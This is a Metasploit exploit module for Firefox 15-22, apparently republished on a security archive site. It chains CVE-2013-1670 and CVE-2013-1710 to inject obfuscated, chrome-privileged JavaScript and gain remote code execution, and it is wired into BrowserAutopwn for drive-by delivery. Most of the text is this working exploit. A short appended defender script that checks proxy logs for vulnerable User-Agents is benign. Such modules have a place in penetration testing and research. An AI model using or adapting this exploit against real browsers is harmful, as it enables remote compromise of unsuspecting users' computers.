Firefox toString console.time Privileged Javascript Injection
Source: metasploit.com Author: joev Published: 2014-08-20
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
require 'rex/exploitation/jsobfu'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
  
  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "15.0",
    :ua_maxver  => "22.0",
    :javascript => true,
    :rank       => ExcellentRanking
  })
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
      'Description'    => %q{
        This exploit gains remote code execution on Firefox 15-22 by abusing two separate
        Javascript-related vulnerabilities to ultimately inject malicious Javascript code
        into a context running with chrome:// privileges.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'Cody Crews',   # discovered CVE-2013-1670
        'joev' # metasploit module
      ],
      'DisclosureDate' => "May 14 2013",
      'References' => [
        ['CVE', '2013-1670'], # privileged access for content-level constructor
        ['CVE', '2013-1710'] # further chrome injection
      ],
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 22) }
      }
    ))
  
    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end
  
  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end
  
  def generate_html(target_info)
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
  
    js = Rex::Exploitation::JSObfu.new(%Q|
      var opts = #{JSON.unparse(opts)};
      var key = opts['#{key}'];
      var y = {}, q = false;
      y.constructor.prototype.toString=function() {
        if (q) return;
        q = true;
        crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
        return 5;
      };
      console.time(y);
    |)
  
    js.obfuscate
  
    %Q|
      <!doctype html>
      <html>
        <body>
          <script>
            #{js}
          </script>
          #{datastore['CONTENT']}
        </body>
      </html>
    |
  end
end
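
A defender-side exposure check, added here and not part of the Metasploit module: it reads proxy log lines and lists clients whose User-Agent reports Firefox 15 through 22, the range the module's BrowserRequirements accepts. The log format, addresses and function names are assumptions constructed for this example.

```ruby
# Added example (not part of the Metasploit module). The log format and
# addresses below are constructed for illustration.

# Major versions accepted by the module's BrowserRequirements lambda.
AFFECTED_MAJOR = (15..22)

# Constructed sample proxy log lines: client IP, then quoted User-Agent.
SAMPLE_LOG = <<~LOG
  10.0.0.11 "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
  10.0.0.12 "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"
  10.0.0.13 "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
  10.0.0.14 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"
  10.0.0.11 "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
  10.0.0.15 "Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0"
  malformed line without a user agent
LOG

# Return the Firefox major version found in a User-Agent string, or nil.
def firefox_major(user_agent)
  m = user_agent.match(%r{\bFirefox/(\d+)(?:\.\d+)*})
  m && m[1].to_i
end

# Map each client IP to the affected Firefox major versions it reported.
def exposed_clients(log_text)
  exposed = Hash.new { |h, k| h[k] = [] }
  log_text.each_line do |line|
    m = line.match(/\A(\S+)\s+"([^"]*)"/)
    next unless m                       # skip lines that do not parse
    major = firefox_major(m[2])
    next unless major && AFFECTED_MAJOR.cover?(major)
    exposed[m[1]] |= [major]            # de-duplicate repeat sightings
  end
  exposed
end

if __FILE__ == $PROGRAM_NAME
  exposed_clients(SAMPLE_LOG).each do |ip, versions|
    puts "#{ip} reports affected Firefox #{versions.sort.join(', ')}: upgrade"
  end
end
```

User-Agent strings are self-reported, so treat the result as an inventory hint for prioritising upgrades, not as proof of the installed version.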

 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved